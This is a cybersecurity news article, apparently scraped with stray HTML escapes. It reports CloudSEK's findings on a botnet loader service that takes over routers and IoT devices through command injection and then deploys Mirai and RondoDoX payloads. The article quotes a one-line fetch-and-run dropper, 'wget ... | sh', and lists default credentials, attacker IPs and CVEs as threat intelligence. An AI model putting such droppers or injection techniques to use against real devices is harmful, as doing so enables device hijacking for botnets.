A sophisticated botnet operation has emerged, employing a Loader-as-a-Service model to systematically weaponize internet-connected devices across the globe.<\/p>\n
The campaign exploits SOHO routers, IoT devices, and enterprise applications through command injection vulnerabilities in web interfaces, demonstrating an alarming evolution in cybercriminal tactics.<\/p>\n
The malicious infrastructure operates by targeting unsanitized POST parameters in network management fields including NTP, syslog, and hostname configurations.<\/p>\n
Attackers inject shell commands into these vulnerable input fields, enabling remote execution<\/a> through minimal one-line droppers such as This approach maximizes success rates across diverse device architectures while maintaining operational stealth.<\/p>\n The botnet systematically progresses through multiple attack phases, beginning with automated authentication probes using default credentials like admin:admin combinations.<\/p>\n Upon successful access, the operation deploys fetch-and-execute chains that download RondoDoX, Mirai, and Morte payloads from distributed command infrastructure spanning multiple IP addresses including 74.194.191.52, 83.252.42.112, and 196.251.73.24.<\/p>\n CloudSEK analysts identified<\/a> this campaign through exposed command and control logs spanning six months of operations.<\/p>\n The security firm\u2019s TRIAD platform discovered logger panels containing detailed attack vectors and infrastructure deployment patterns, providing unprecedented visibility into the botnet\u2019s operational methodology.<\/p>\n The malware demonstrates remarkable adaptability through multi-architecture payload support, utilizing BusyBox utilities for cross-platform compatibility.<\/p>\n The operation targets Oracle WebLogic servers, embedded Linux systems, and specific router administration interfaces including wlwps.htm and wan_dyna.html pages.<\/p>\n Additionally, the campaign<\/a> exploits known CVEs including CVE-2019-17574 (WordPress Popup Maker), CVE-2019-16759 (vBulletin pre-auth RCE), and CVE-2012-1823 (PHP-CGI query string handling).<\/p>\n The botnet\u2019s primary infiltration method centers on exploiting web GUI fields through sophisticated command injection techniques.<\/p>\n The operation specifically targets network configuration parameters where administrators typically input server addresses and system settings.<\/p>\n When devices process these malformed inputs without proper sanitization, the injected commands execute with system privileges.<\/p>\n The attack chain utilizes multiple fallback protocols to ensure payload delivery success. If HTTP-based wget commands fail, the system automatically attempts TFTP and FTP<\/a> transfers using commands like ftpget and tftp.<\/p>\n This redundancy, combined with hosting identical payloads across numerous IP addresses, creates a resilient distribution network that survives individual server takedowns.<\/p>\n Post-compromise, the botnet<\/a> conducts comprehensive device fingerprinting through ReplyDeviceInfo modules, collecting MAC addresses, hostnames, firmware versions, and available services.<\/p>\n This reconnaissance determines which architecture-specific binaries to deploy and whether devices should be retained for cryptocurrency mining, DDoS<\/a> participation, or sold as access credentials to other threat actors.<\/p>\n Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n The post New Botnet Loader-as-a-Service Exploiting Routers and IoT Devices to Deploy Mirai Payloads<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nwget -qO- http:\/\/IP\/rondo.*.sh | sh<\/code>.<\/p>\nCommand Injection Attack Mechanism<\/strong><\/h2>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRefGvTqTpnmFHJmZncIkYGQv_SJwuQJSCrlZyBWkI6BNYFzT-lnuBMcTrsoRnfQ_Bf5ITqjnt4TiQ_5KvjL727WddTwPWBR1G2eIynp90bBKOHuO8ahNrN6kvothSXZbrJeqrtn5RYLxmZDmAYzvj8ndJDy1y22ydKmBeH7rpyTBoKInh_MjVm5esh2M\/s16000\/Exploitation%2520of%2520Old%2520CVEs%2520%28Source%2520-%2520CloudSEK%29.webp?ssl=1\")